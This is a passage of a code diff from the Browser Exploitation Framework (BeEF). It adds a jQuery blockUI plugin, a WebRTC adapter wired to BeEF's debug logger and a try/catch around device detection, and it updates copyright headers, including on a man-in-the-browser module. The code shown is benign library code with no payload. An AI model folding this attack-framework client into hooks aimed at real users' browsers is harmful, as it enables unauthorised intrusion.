+					timeout: typeof opts.timeout !== 'undefined' ? opts.timeout : timeout,
+					centerY: false,
+					showOverlay: false,
+					onUnblock: onClose,
+					css: $.blockUI.defaults.growlCSS
+				});
+			};
+
+			callBlock();
+			var nonmousedOpacity = $m.css('opacity');
+			$m.mouseover(function() {
+				callBlock({
+					fadeIn: 0,
+					timeout: 30000
+				});
+
+				var displayBlock = $('.blockMsg');
+				displayBlock.stop(); // cancel fadeout if it has started
+				displayBlock.fadeTo(300, 1); // make it easier to read the message by removing transparency
+			}).mouseout(function() {
+				$('.blockMsg').fadeOut(1000);
+			});
+			// End konapun additions
+		};
+
+		// plugin method for blocking element content
+		$.fn.block = function(opts) {
+			if ( this[0] === window ) {
+				$.blockUI( opts );
+				return this;
+			}
+			var fullOpts = $.extend({}, $.blockUI.defaults, opts || {});
+			this.each(function() {
+				var $el = $(this);
+				if (fullOpts.ignoreIfBlocked && $el.data('blockUI.isBlocked'))
+					return;
+				$el.unblock({ fadeOut: 0 });
+			});
+
+			return this.each(function() {
+				if ($.css(this,'position') == 'static') {
+					this.style.position = 'relative';
+					$(this).data('blockUI.static', true);
+				}
+				this.style.zoom = 1; // force 'hasLayout' in ie
+				install(this, opts);
+			});
+		};
+
+		// plugin method for unblocking element content
+		$.fn.unblock = function(opts) {
+			if ( this[0] === window ) {
+				$.unblockUI( opts );
+				return this;
+			}
+			return this.each(function() {
+				remove(this, opts);
+			});
+		};
+
+		$.blockUI.version = 2.70; // 2nd generation blocking at no extra cost!
+
+		// override these in your code to change the default behavior and style
+		$.blockUI.defaults = {
+			// message displayed when blocking (use null for no message)
+			message:  '<h1>Please wait...</h1>',
+
+			title: null,		// title string; only used when theme == true
+			draggable: true,	// only used when theme == true (requires jquery-ui.js to be loaded)
+
+			theme: false, // set to true to use with jQuery UI themes
+
+			// styles for the message when blocking; if you wish to disable
+			// these and use an external stylesheet then do this in your code:
+			// $.blockUI.defaults.css = {};
+			css: {
+				padding:	0,
+				margin:		0,
+				width:		'30%',
+				top:		'40%',
+				left:		'35%',
+				textAlign:	'center',
+				color:		'#000',
+				border:		'3px solid #aaa',
+				backgroundColor:'#fff',
+				cursor:		'wait'
+			},
+
+			// minimal style set used when themes are used
+			themedCSS: {
+				width:	'30%',
+				top:	'40%',
+				left:	'35%'
+			},
+
+			// styles for the overlay
+			overlayCSS:  {
+				backgroundColor:	'#000',
+				opacity:			0.6,
+				cursor:				'wait'
+			},
+
+			// style to replace wait cursor before unblocking to correct issue
+			// of lingering wait cursor
+			cursorReset: 'default',
+
+			// styles applied when using $.growlUI
+			growlCSS: {
+				width:		'350px',
+				top:		'10px',
+				left:		'',
+				right:		'10px',
+				border:		'none',
+				padding:	'5px',
+				opacity:	0.6,
+				cursor:		'default',
+				color:		'#fff',
+				backgroundColor: '#000',
+				'-webkit-border-radius':'10px',
+				'-moz-border-radius':	'10px',
+				'border-radius':		'10px'
+			},
+
+			// IE issues: 'about:blank' fails on HTTPS and javascript:false is s-l-o-w
+			// (hat tip to Jorge H. N. de Vasconcelos)
+			/*jshint scripturl:true */
+			iframeSrc: /^https/i.test(window.location.href || '') ? 'javascript:false' : 'about:blank',
+
+			// force usage of iframe in non-IE browsers (handy for blocking applets)
+			forceIframe: false,
+
+			// z-index for the blocking overlay
+			baseZ: 1000,
+
+			// set these to true to have the message automatically centered
+			centerX: true, // <-- only effects element blocking (page block controlled via css above)
+			centerY: true,
+
+			// allow body element to be stetched in ie6; this makes blocking look better
+			// on "short" pages.  disable if you wish to prevent changes to the body height
+			allowBodyStretch: true,
+
+			// enable if you want key and mouse events to be disabled for content that is blocked
+			bindEvents: true,
+
+			// be default blockUI will supress tab navigation from leaving blocking content
+			// (if bindEvents is true)
+			constrainTabKey: true,
+
+			// fadeIn time in millis; set to 0 to disable fadeIn on block
+			fadeIn:  200,
+
+			// fadeOut time in millis; set to 0 to disable fadeOut on unblock
+			fadeOut:  400,
+
+			// time in millis to wait before auto-unblocking; set to 0 to disable auto-unblock
+			timeout: 0,
+
+			// disable if you don't want to show the overlay
+			showOverlay: true,
+
+			// if true, focus will be placed in the first available input field when
+			// page blocking
+			focusInput: true,
+
+            // elements that can receive focus
+            focusableElements: ':input:enabled:visible',
+
+			// suppresses the use of overlay styles on FF/Linux (due to performance issues with opacity)
+			// no longer needed in 2012
+			// applyPlatformOpacityRules: true,
+
+			// callback method invoked when fadeIn has completed and blocking message is visible
+			onBlock: null,
+
+			// callback method invoked when unblocking has completed; the callback is
+			// passed the element that has been unblocked (which is the window object for page
+			// blocks) and the options that were passed to the unblock call:
+			//	onUnblock(element, options)
+			onUnblock: null,
+
+			// callback method invoked when the overlay area is clicked.
+			// setting this will turn the cursor to a pointer, otherwise cursor defined in overlayCss will be used.
+			onOverlayClick: null,
+
+			// don't ask; if you really must know: http://groups.google.com/group/jquery-en/browse_thread/thread/36640a8730503595/2f6a79a77a78e493#2f6a79a77a78e493
+			quirksmodeOffsetHack: 4,
+
+			// class name of the message block
+			blockMsgClass: 'blockMsg',
+
+			// if it is already blocked, then ignore it (don't unblock and reblock)
+			ignoreIfBlocked: false
+		};
+
+		// private data and functions follow...
+
+		var pageBlock = null;
+		var pageBlockEls = [];
+
+		function install(el, opts) {
+			var css, themedCSS;
+			var full = (el == window);
+			var msg = (opts && opts.message !== undefined ? opts.message : undefined);
+			opts = $.extend({}, $.blockUI.defaults, opts || {});
+
+			if (opts.ignoreIfBlocked && $(el).data('blockUI.isBlocked'))
+				return;
+
+			opts.overlayCSS = $.extend({}, $.blockUI.defaults.overlayCSS, opts.overlayCSS || {});
+			css = $.extend({}, $.blockUI.defaults.css, opts.css || {});
+			if (opts.onOverlayClick)
+				opts.overlayCSS.cursor = 'pointer';
+
+			themedCSS = $.extend({}, $.blockUI.defaults.themedCSS, opts.themedCSS || {});
+			msg = msg === undefined ? opts.message : msg;
+
+			// remove the current block (if there is one)
+			if (full && pageBlock)
+				remove(window, {fadeOut:0});
+
+			// if an existing element is being used as the blocking content then we capture
+			// its current place in the DOM (and current display style) so we can restore
+			// it when we unblock
+			if (msg && typeof msg != 'string' && (msg.parentNode || msg.jquery)) {
+				var node = msg.jquery ? msg[0] : msg;
+				var data = {};
+				$(el).data('blockUI.history', data);
+				data.el = node;
+				data.parent = node.parentNode;
+				data.display = node.style.display;
+				data.position = node.style.position;
+				if (data.parent)
+					data.parent.removeChild(node);
+			}
+
+			$(el).data('blockUI.onUnblock', opts.onUnblock);
+			var z = opts.baseZ;
+
+			// blockUI uses 3 layers for blocking, for simplicity they are all used on every platform;
+			// layer1 is the iframe layer which is used to supress bleed through of underlying content
+			// layer2 is the overlay layer which has opacity and a wait cursor (by default)
+			// layer3 is the message content that is displayed while blocking
+			var lyr1, lyr2, lyr3, s;
+			if (msie || opts.forceIframe)
+				lyr1 = $('<iframe class="blockUI" style="z-index:'+ (z++) +';display:none;border:none;margin:0;padding:0;position:absolute;width:100%;height:100%;top:0;left:0" src="'+opts.iframeSrc+'"></iframe>');
+			else
+				lyr1 = $('<div class="blockUI" style="display:none"></div>');
+
+			if (opts.theme)
+				lyr2 = $('<div class="blockUI blockOverlay ui-widget-overlay" style="z-index:'+ (z++) +';display:none"></div>');
+			else
+				lyr2 = $('<div class="blockUI blockOverlay" style="z-index:'+ (z++) +';display:none;border:none;margin:0;padding:0;width:100%;height:100%;top:0;left:0"></div>');
+
+			if (opts.theme && full) {
+				s = '<div class="blockUI ' + opts.blockMsgClass + ' blockPage ui-dialog ui-widget ui-corner-all" style="z-index:'+(z+10)+';display:none;position:fixed">';
+				if ( opts.title ) {
+					s += '<div class="ui-widget-header ui-dialog-titlebar ui-corner-all blockTitle">'+(opts.title || '&nbsp;')+'</div>';
+				}
+				s += '<div class="ui-widget-content ui-dialog-content"></div>';
+				s += '</div>';
+			}
+			else if (opts.theme) {
+				s = '<div class="blockUI ' + opts.blockMsgClass + ' blockElement ui-dialog ui-widget ui-corner-all" style="z-index:'+(z+10)+';display:none;position:absolute">';
+				if ( opts.title ) {
+					s += '<div class="ui-widget-header ui-dialog-titlebar ui-corner-all blockTitle">'+(opts.title || '&nbsp;')+'</div>';
+				}
+				s += '<div class="ui-widget-content ui-dialog-content"></div>';
+				s += '</div>';
+			}
+			else if (full) {
+				s = '<div class="blockUI ' + opts.blockMsgClass + ' blockPage" style="z-index:'+(z+10)+';display:none;position:fixed"></div>';
+			}
+			else {
+				s = '<div class="blockUI ' + opts.blockMsgClass + ' blockElement" style="z-index:'+(z+10)+';display:none;position:absolute"></div>';
+			}
+			lyr3 = $(s);
+
+			// if we have a message, style it
+			if (msg) {
+				if (opts.theme) {
+					lyr3.css(themedCSS);
+					lyr3.addClass('ui-widget-content');
+				}
+				else
+					lyr3.css(css);
+			}
+
+			// style the overlay
+			if (!opts.theme /*&& (!opts.applyPlatformOpacityRules)*/)
+				lyr2.css(opts.overlayCSS);
+			lyr2.css('position', full ? 'fixed' : 'absolute');
+
+			// make iframe layer transparent in IE
+			if (msie || opts.forceIframe)
+				lyr1.css('opacity',0.0);
+
+			//$([lyr1[0],lyr2[0],lyr3[0]]).appendTo(full ? 'body' : el);
+			var layers = [lyr1,lyr2,lyr3], $par = full ? $('body') : $(el);
+			$.each(layers, function() {
+				this.appendTo($par);
+			});
+
+			if (opts.theme && opts.draggable && $.fn.draggable) {
+				lyr3.draggable({
+					handle: '.ui-dialog-titlebar',
+					cancel: 'li'
+				});
+			}
+
+			// ie7 must use absolute positioning in quirks mode and to account for activex issues (when scrolling)
+			var expr = setExpr && (!$.support.boxModel || $('object,embed', full ? null : el).length > 0);
+			if (ie6 || expr) {
+				// give body 100% height
+				if (full && opts.allowBodyStretch && $.support.boxModel)
+					$('html,body').css('height','100%');
+
+				// fix ie6 issue when blocked element has a border width
+				if ((ie6 || !$.support.boxModel) && !full) {
+					var t = sz(el,'borderTopWidth'), l = sz(el,'borderLeftWidth');
+					var fixT = t ? '(0 - '+t+')' : 0;
+					var fixL = l ? '(0 - '+l+')' : 0;
+				}
+
+				// simulate fixed position
+				$.each(layers, function(i,o) {
+					var s = o[0].style;
+					s.position = 'absolute';
+					if (i < 2) {
+						if (full)
+							s.setExpression('height','Math.max(document.body.scrollHeight, document.body.offsetHeight) - (jQuery.support.boxModel?0:'+opts.quirksmodeOffsetHack+') + "px"');
+						else
+							s.setExpression('height','this.parentNode.offsetHeight + "px"');
+						if (full)
+							s.setExpression('width','jQuery.support.boxModel && document.documentElement.clientWidth || document.body.clientWidth + "px"');
+						else
+							s.setExpression('width','this.parentNode.offsetWidth + "px"');
+						if (fixL) s.setExpression('left', fixL);
+						if (fixT) s.setExpression('top', fixT);
+					}
+					else if (opts.centerY) {
+						if (full) s.setExpression('top','(document.documentElement.clientHeight || document.body.clientHeight) / 2 - (this.offsetHeight / 2) + (blah = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + "px"');
+						s.marginTop = 0;
+					}
+					else if (!opts.centerY && full) {
+						var top = (opts.css && opts.css.top) ? parseInt(opts.css.top, 10) : 0;
+						var expression = '((document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + '+top+') + "px"';
+						s.setExpression('top',expression);
+					}
+				});
+			}
+
+			// show the message
+			if (msg) {
+				if (opts.theme)
+					lyr3.find('.ui-widget-content').append(msg);
+				else
+					lyr3.append(msg);
+				if (msg.jquery || msg.nodeType)
+					$(msg).show();
+			}
+
+			if ((msie || opts.forceIframe) && opts.showOverlay)
+				lyr1.show(); // opacity is zero
+			if (opts.fadeIn) {
+				var cb = opts.onBlock ? opts.onBlock : noOp;
+				var cb1 = (opts.showOverlay && !msg) ? cb : noOp;
+				var cb2 = msg ? cb : noOp;
+				if (opts.showOverlay)
+					lyr2._fadeIn(opts.fadeIn, cb1);
+				if (msg)
+					lyr3._fadeIn(opts.fadeIn, cb2);
+			}
+			else {
+				if (opts.showOverlay)
+					lyr2.show();
+				if (msg)
+					lyr3.show();
+				if (opts.onBlock)
+					opts.onBlock.bind(lyr3)();
+			}
+
+			// bind key and mouse events
+			bind(1, el, opts);
+
+			if (full) {
+				pageBlock = lyr3[0];
+				pageBlockEls = $(opts.focusableElements,pageBlock);
+				if (opts.focusInput)
+					setTimeout(focus, 20);
+			}
+			else
+				center(lyr3[0], opts.centerX, opts.centerY);
+
+			if (opts.timeout) {
+				// auto-unblock
+				var to = setTimeout(function() {
+					if (full)
+						$.unblockUI(opts);
+					else
+						$(el).unblock(opts);
+				}, opts.timeout);
+				$(el).data('blockUI.timeout', to);
+			}
+		}
+
+		// remove the block
+		function remove(el, opts) {
+			var count;
+			var full = (el == window);
+			var $el = $(el);
+			var data = $el.data('blockUI.history');
+			var to = $el.data('blockUI.timeout');
+			if (to) {
+				clearTimeout(to);
+				$el.removeData('blockUI.timeout');
+			}
+			opts = $.extend({}, $.blockUI.defaults, opts || {});
+			bind(0, el, opts); // unbind events
+
+			if (opts.onUnblock === null) {
+				opts.onUnblock = $el.data('blockUI.onUnblock');
+				$el.removeData('blockUI.onUnblock');
+			}
+
+			var els;
+			if (full) // crazy selector to handle odd field errors in ie6/7
+				els = $('body').children().filter('.blockUI').add('body > .blockUI');
+			else
+				els = $el.find('>.blockUI');
+
+			// fix cursor issue
+			if ( opts.cursorReset ) {
+				if ( els.length > 1 )
+					els[1].style.cursor = opts.cursorReset;
+				if ( els.length > 2 )
+					els[2].style.cursor = opts.cursorReset;
+			}
+
+			if (full)
+				pageBlock = pageBlockEls = null;
+
+			if (opts.fadeOut) {
+				count = els.length;
+				els.stop().fadeOut(opts.fadeOut, function() {
+					if ( --count === 0)
+						reset(els,data,opts,el);
+				});
+			}
+			else
+				reset(els, data, opts, el);
+		}
+
+		// move blocking element back into the DOM where it started
+		function reset(els,data,opts,el) {
+			var $el = $(el);
+			if ( $el.data('blockUI.isBlocked') )
+				return;
+
+			els.each(function(i,o) {
+				// remove via DOM calls so we don't lose event handlers
+				if (this.parentNode)
+					this.parentNode.removeChild(this);
+			});
+
+			if (data && data.el) {
+				data.el.style.display = data.display;
+				data.el.style.position = data.position;
+				data.el.style.cursor = 'default'; // #59
+				if (data.parent)
+					data.parent.appendChild(data.el);
+				$el.removeData('blockUI.history');
+			}
+
+			if ($el.data('blockUI.static')) {
+				$el.css('position', 'static'); // #22
+			}
+
+			if (typeof opts.onUnblock == 'function')
+				opts.onUnblock(el,opts);
+
+			// fix issue in Safari 6 where block artifacts remain until reflow
+			var body = $(document.body), w = body.width(), cssW = body[0].style.width;
+			body.width(w-1).width(w);
+			body[0].style.width = cssW;
+		}
+
+		// bind/unbind the handler
+		function bind(b, el, opts) {
+			var full = el == window, $el = $(el);
+
+			// don't bother unbinding if there is nothing to unbind
+			if (!b && (full && !pageBlock || !full && !$el.data('blockUI.isBlocked')))
+				return;
+
+			$el.data('blockUI.isBlocked', b);
+
+			// don't bind events when overlay is not in use or if bindEvents is false
+			if (!full || !opts.bindEvents || (b && !opts.showOverlay))
+				return;
+
+			// bind anchors and inputs for mouse and key events
+			var events = 'mousedown mouseup keydown keypress keyup touchstart touchend touchmove';
+			if (b)
+				$(document).bind(events, opts, handler);
+			else
+				$(document).unbind(events, handler);
+
+		// former impl...
+		//		var $e = $('a,:input');
+		//		b ? $e.bind(events, opts, handler) : $e.unbind(events, handler);
+		}
+
+		// event handler to suppress keyboard/mouse events when blocking
+		function handler(e) {
+			// allow tab navigation (conditionally)
+			if (e.type === 'keydown' && e.keyCode && e.keyCode == 9) {
+				if (pageBlock && e.data.constrainTabKey) {
+					var els = pageBlockEls;
+					var fwd = !e.shiftKey && e.target === els[els.length-1];
+					var back = e.shiftKey && e.target === els[0];
+					if (fwd || back) {
+						setTimeout(function(){focus(back);},10);
+						return false;
+					}
+				}
+			}
+			var opts = e.data;
+			var target = $(e.target);
+			if (target.hasClass('blockOverlay') && opts.onOverlayClick)
+				opts.onOverlayClick(e);
+
+			// allow events within the message content
+			if (target.parents('div.' + opts.blockMsgClass).length > 0)
+				return true;
+
+			// allow events for content that is not being blocked
+			return target.parents().children().filter('div.blockUI').length === 0;
+		}
+
+		function focus(back) {
+			if (!pageBlockEls)
+				return;
+			var e = pageBlockEls[back===true ? pageBlockEls.length-1 : 0];
+			if (e)
+				e.focus();
+		}
+
+		function center(el, x, y) {
+			var p = el.parentNode, s = el.style;
+			var l = ((p.offsetWidth - el.offsetWidth)/2) - sz(p,'borderLeftWidth');
+			var t = ((p.offsetHeight - el.offsetHeight)/2) - sz(p,'borderTopWidth');
+			if (x) s.left = l > 0 ? (l+'px') : '0';
+			if (y) s.top  = t > 0 ? (t+'px') : '0';
+		}
+
+		function sz(el, p) {
+			return parseInt($.css(el,p),10)||0;
+		}
+
+	}
+
+
+	/*global define:true */
+	if (typeof define === 'function' && define.amd && define.amd.jQuery) {
+		define(['jquery'], setup);
+	} else {
+		setup(jQuery);
+	}
+
+})();
--- a/core/main/client/lib/mdetect.js
+++ b/core/main/client/lib/mdetect.js
@@ -703,4 +703,6 @@ function InitDeviceScan()
    isTierGenericMobile = DetectTierOtherPhones();
 };

-InitDeviceScan()
+try {
+   InitDeviceScan();
+}catch(e){}
--- a/core/main/client/lib/webrtcadapter.js
+++ b/core/main/client/lib/webrtcadapter.js
@@ -0,0 +1,409 @@
+/*
+ *  Copyright (c) 2014 The WebRTC project authors. All Rights Reserved.
+ *
+ *  Use of this source code is governed by a BSD-style license
+ *  that can be found in the LICENSE file in the root of the source
+ *  tree.
+ */
+
+/* More information about these options at jshint.com/docs/options */
+/* jshint browser: true, camelcase: true, curly: true, devel: true,
+   eqeqeq: true, forin: false, globalstrict: true, node: true,
+   quotmark: single, undef: true, unused: strict */
+/* global mozRTCIceCandidate, mozRTCPeerConnection, Promise,
+mozRTCSessionDescription, webkitRTCPeerConnection, MediaStreamTrack */
+/* exported trace,requestUserMedia */
+
+'use strict';
+
+var getUserMedia = null;
+var attachMediaStream = null;
+var reattachMediaStream = null;
+var webrtcDetectedBrowser = null;
+var webrtcDetectedVersion = null;
+var webrtcMinimumVersion = null;
+
+function trace(text) {
+  // This function is used for logging.
+  if (text[text.length - 1] === '\n') {
+    text = text.substring(0, text.length - 1);
+  }
+  if (window.performance) {
+    var now = (window.performance.now() / 1000).toFixed(3);
+    beef.debug(now + ': ' + text);
+  } else {
+    beef.debug(text);
+  }
+}
+
+if (navigator.mozGetUserMedia) {
+
+  webrtcDetectedBrowser = 'firefox';
+
+  // the detected firefox version.
+  webrtcDetectedVersion =
+    parseInt(navigator.userAgent.match(/Firefox\/([0-9]+)\./)[1], 10);
+
+  // the minimum firefox version still supported by adapter.
+  webrtcMinimumVersion = 31;
+
+  // The RTCPeerConnection object.
+  window.RTCPeerConnection = function(pcConfig, pcConstraints) {
+    if (webrtcDetectedVersion < 38) {
+      // .urls is not supported in FF < 38.
+      // create RTCIceServers with a single url.
+      if (pcConfig && pcConfig.iceServers) {
+        var newIceServers = [];
+        for (var i = 0; i < pcConfig.iceServers.length; i++) {
+          var server = pcConfig.iceServers[i];
+          if (server.hasOwnProperty('urls')) {
+            for (var j = 0; j < server.urls.length; j++) {
+              var newServer = {
+                url: server.urls[j]
+              };
+              if (server.urls[j].indexOf('turn') === 0) {
+                newServer.username = server.username;
+                newServer.credential = server.credential;
+              }
+              newIceServers.push(newServer);
+            }
+          } else {
+            newIceServers.push(pcConfig.iceServers[i]);
+          }
+        }
+        pcConfig.iceServers = newIceServers;
+      }
+    }
+    return new mozRTCPeerConnection(pcConfig, pcConstraints);
+  };
+
+  // The RTCSessionDescription object.
+  window.RTCSessionDescription = mozRTCSessionDescription;
+
+  // The RTCIceCandidate object.
+  window.RTCIceCandidate = mozRTCIceCandidate;
+
+  // getUserMedia constraints shim.
+  getUserMedia = (webrtcDetectedVersion < 38) ?
+      function(c, onSuccess, onError) {
+    var constraintsToFF37 = function(c) {
+      if (typeof c !== 'object' || c.require) {
+        return c;
+      }
+      var require = [];
+      Object.keys(c).forEach(function(key) {
+        var r = c[key] = (typeof c[key] === 'object') ?
+            c[key] : {ideal: c[key]};
+        if (r.exact !== undefined) {
+          r.min = r.max = r.exact;
+          delete r.exact;
+        }
+        if (r.min !== undefined || r.max !== undefined) {
+          require.push(key);
+        }
+        if (r.ideal !== undefined) {
+          c.advanced = c.advanced || [];
+          var oc = {};
+          oc[key] = {min: r.ideal, max: r.ideal};
+          c.advanced.push(oc);
+          delete r.ideal;
+          if (!Object.keys(r).length) {
+            delete c[key];
+          }
+        }
+      });
+      if (require.length) {
+        c.require = require;
+      }
+      return c;
+    };
+    beef.debug('spec: ' + JSON.stringify(c));
+    c.audio = constraintsToFF37(c.audio);
+    c.video = constraintsToFF37(c.video);
+    beef.debug('ff37: ' + JSON.stringify(c));
+    return navigator.mozGetUserMedia(c, onSuccess, onError);
+  } : navigator.mozGetUserMedia.bind(navigator);
+
+  navigator.getUserMedia = getUserMedia;
+
+  // Shim for mediaDevices on older versions.
+  if (!navigator.mediaDevices) {
+    navigator.mediaDevices = {getUserMedia: requestUserMedia,
+      addEventListener: function() { },
+      removeEventListener: function() { }
+    };
+  }
+  navigator.mediaDevices.enumerateDevices =
+      navigator.mediaDevices.enumerateDevices || function() {
+    return new Promise(function(resolve) {
+      var infos = [
+        {kind: 'audioinput', deviceId: 'default', label:'', groupId:''},
+        {kind: 'videoinput', deviceId: 'default', label:'', groupId:''}
+      ];
+      resolve(infos);
+    });
+  };
+
+  if (webrtcDetectedVersion < 41) {
+    // Work around http://bugzil.la/1169665
+    var orgEnumerateDevices =
+        navigator.mediaDevices.enumerateDevices.bind(navigator.mediaDevices);
+    navigator.mediaDevices.enumerateDevices = function() {
+      return orgEnumerateDevices().catch(function(e) {
+        if (e.name === 'NotFoundError') {
+          return [];
+        }
+        throw e;
+      });
+    };
+  }
+  // Attach a media stream to an element.
+  attachMediaStream = function(element, stream) {
+    beef.debug('Attaching media stream');
+    element.mozSrcObject = stream;
+  };
+
+  reattachMediaStream = function(to, from) {
+    beef.debug('Reattaching media stream');
+    to.mozSrcObject = from.mozSrcObject;
+  };
+
+} else if (navigator.webkitGetUserMedia) {
+
+  webrtcDetectedBrowser = 'chrome';
+
+  // the detected chrome version.
+  webrtcDetectedVersion =
+    parseInt(navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./)[2], 10);
+
+  // the minimum chrome version still supported by adapter.
+  webrtcMinimumVersion = 38;
+
+  // The RTCPeerConnection object.
+  window.RTCPeerConnection = function(pcConfig, pcConstraints) {
+    var pc = new webkitRTCPeerConnection(pcConfig, pcConstraints);
+    var origGetStats = pc.getStats.bind(pc);
+    pc.getStats = function(selector, successCallback, errorCallback) { // jshint ignore: line
+      // If selector is a function then we are in the old style stats so just
+      // pass back the original getStats format to avoid breaking old users.
+      if (typeof selector === 'function') {
+        return origGetStats(selector, successCallback);
+      }
+
+      var fixChromeStats = function(response) {
+        var standardReport = {};
+        var reports = response.result();
+        reports.forEach(function(report) {
+          var standardStats = {
+            id: report.id,
+            timestamp: report.timestamp,
+            type: report.type
+          };
+          report.names().forEach(function(name) {
+            standardStats[name] = report.stat(name);
+          });
+          standardReport[standardStats.id] = standardStats;
+        });
+
+        return standardReport;
+      };
+      var successCallbackWrapper = function(response) {
+        successCallback(fixChromeStats(response));
+      };
+      return origGetStats(successCallbackWrapper, selector);
+    };
+
+    return pc;
+  };
+
+  // add promise support
+  ['createOffer', 'createAnswer'].forEach(function(method) {
+    var nativeMethod = webkitRTCPeerConnection.prototype[method];
+    webkitRTCPeerConnection.prototype[method] = function() {
+      var self = this;
+      if (arguments.length < 1 || (arguments.length === 1 &&
+          typeof(arguments[0]) === 'object')) {
+        var opts = arguments.length === 1 ? arguments[0] : undefined;
+        return new Promise(function(resolve, reject) {
+          nativeMethod.apply(self, [resolve, reject, opts]);
+        });
+      } else {
+        return nativeMethod.apply(this, arguments);
+      }
+    };
+  });
+
+  ['setLocalDescription', 'setRemoteDescription',
+      'addIceCandidate'].forEach(function(method) {
+    var nativeMethod = webkitRTCPeerConnection.prototype[method];
+    webkitRTCPeerConnection.prototype[method] = function() {
+      var args = arguments;
+      var self = this;
+      return new Promise(function(resolve, reject) {
+        nativeMethod.apply(self, [args[0],
+            function() {
+              resolve();
+              if (args.length >= 2) {
+                args[1].apply(null, []);
+              }
+            },
+            function(err) {
+              reject(err);
+              if (args.length >= 3) {
+                args[2].apply(null, [err]);
+              }
+            }]
+          );
+      });
+    };
+  });
+
+  // getUserMedia constraints shim.
+  getUserMedia = function(c, onSuccess, onError) {
+    var constraintsToChrome = function(c) {
+      if (typeof c !== 'object' || c.mandatory || c.optional) {
+        return c;
+      }
+      var cc = {};
+      Object.keys(c).forEach(function(key) {
+        if (key === 'require' || key === 'advanced') {
+          return;
+        }
+        var r = (typeof c[key] === 'object') ? c[key] : {ideal: c[key]};
+        if (r.exact !== undefined && typeof r.exact === 'number') {
+          r.min = r.max = r.exact;
+        }
+        var oldname = function(prefix, name) {
+          if (prefix) {
+            return prefix + name.charAt(0).toUpperCase() + name.slice(1);
+          }
+          return (name === 'deviceId') ? 'sourceId' : name;
+        };
+        if (r.ideal !== undefined) {
+          cc.optional = cc.optional || [];
+          var oc = {};
+          if (typeof r.ideal === 'number') {
+            oc[oldname('min', key)] = r.ideal;
+            cc.optional.push(oc);
+            oc = {};
+            oc[oldname('max', key)] = r.ideal;
+            cc.optional.push(oc);
+          } else {
+            oc[oldname('', key)] = r.ideal;
+            cc.optional.push(oc);
+          }
+        }
+        if (r.exact !== undefined && typeof r.exact !== 'number') {
+          cc.mandatory = cc.mandatory || {};
+          cc.mandatory[oldname('', key)] = r.exact;
+        } else {
+          ['min', 'max'].forEach(function(mix) {
+            if (r[mix] !== undefined) {
+              cc.mandatory = cc.mandatory || {};
+              cc.mandatory[oldname(mix, key)] = r[mix];
+            }
+          });
+        }
+      });
+      if (c.advanced) {
+        cc.optional = (cc.optional || []).concat(c.advanced);
+      }
+      return cc;
+    };
+    beef.debug('spec:   ' + JSON.stringify(c)); // whitespace for alignment
+    c.audio = constraintsToChrome(c.audio);
+    c.video = constraintsToChrome(c.video);
+    beef.debug('chrome: ' + JSON.stringify(c));
+    return navigator.webkitGetUserMedia(c, onSuccess, onError);
+  };
+  navigator.getUserMedia = getUserMedia;
+
+  // Attach a media stream to an element.
+  attachMediaStream = function(element, stream) {
+    if (typeof element.srcObject !== 'undefined') {
+      element.srcObject = stream;
+    } else if (typeof element.src !== 'undefined') {
+      element.src = URL.createObjectURL(stream);
+    } else {
+      beef.debug('Error attaching stream to element.');
+    }
+  };
+
+  reattachMediaStream = function(to, from) {
+    to.src = from.src;
+  };
+
+  if (!navigator.mediaDevices) {
+    navigator.mediaDevices = {getUserMedia: requestUserMedia,
+                              enumerateDevices: function() {
+      return new Promise(function(resolve) {
+        var kinds = {audio: 'audioinput', video: 'videoinput'};
+        return MediaStreamTrack.getSources(function(devices) {
+          resolve(devices.map(function(device) {
+            return {label: device.label,
+                    kind: kinds[device.kind],
+                    deviceId: device.id,
+                    groupId: ''};
+          }));
+        });
+      });
+    }};
+    // in case someone wants to listen for the devicechange event.
+    navigator.mediaDevices.addEventListener = function() { };
+    navigator.mediaDevices.removeEventListener = function() { };
+  }
+} else if (navigator.mediaDevices && navigator.userAgent.match(
+    /Edge\/(\d+).(\d+)$/)) {
+  webrtcDetectedBrowser = 'edge';
+
+  webrtcDetectedVersion =
+    parseInt(navigator.userAgent.match(/Edge\/(\d+).(\d+)$/)[2], 10);
+
+  // the minimum version still supported by adapter.
+  webrtcMinimumVersion = 12;
+
+  attachMediaStream = function(element, stream) {
+    element.srcObject = stream;
+  };
+  reattachMediaStream = function(to, from) {
+    to.srcObject = from.srcObject;
+  };
+} else {
+  // console.log('Browser does not appear to be WebRTC-capable');
+}
+
+// Returns the result of getUserMedia as a Promise.
+function requestUserMedia(constraints) {
+  return new Promise(function(resolve, reject) {
+    getUserMedia(constraints, resolve, reject);
+  });
+}
+
+if (typeof module !== 'undefined') {
+  module.exports = {
+    RTCPeerConnection: window.RTCPeerConnection,
+    getUserMedia: getUserMedia,
+    attachMediaStream: attachMediaStream,
+    reattachMediaStream: reattachMediaStream,
+    webrtcDetectedBrowser: webrtcDetectedBrowser,
+    webrtcDetectedVersion: webrtcDetectedVersion,
+    webrtcMinimumVersion: webrtcMinimumVersion
+    //requestUserMedia: not exposed on purpose.
+    //trace: not exposed on purpose.
+  };
+} else if ((typeof require === 'function') && (typeof define === 'function')) {
+  // Expose objects and functions when RequireJS is doing the loading.
+  define([], function() {
+    return {
+      RTCPeerConnection: window.RTCPeerConnection,
+      getUserMedia: getUserMedia,
+      attachMediaStream: attachMediaStream,
+      reattachMediaStream: reattachMediaStream,
+      webrtcDetectedBrowser: webrtcDetectedBrowser,
+      webrtcDetectedVersion: webrtcDetectedVersion,
+      webrtcMinimumVersion: webrtcMinimumVersion
+      //requestUserMedia: not exposed on purpose.
+      //trace: not exposed on purpose.
+    };
+  });
+}
--- a/core/main/client/logger.js
+++ b/core/main/client/logger.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -106,7 +106,7 @@ beef.mitb = {
                history.pushState({ Be:"EF" }, title, e.currentTarget);
            }
        } catch (e) {
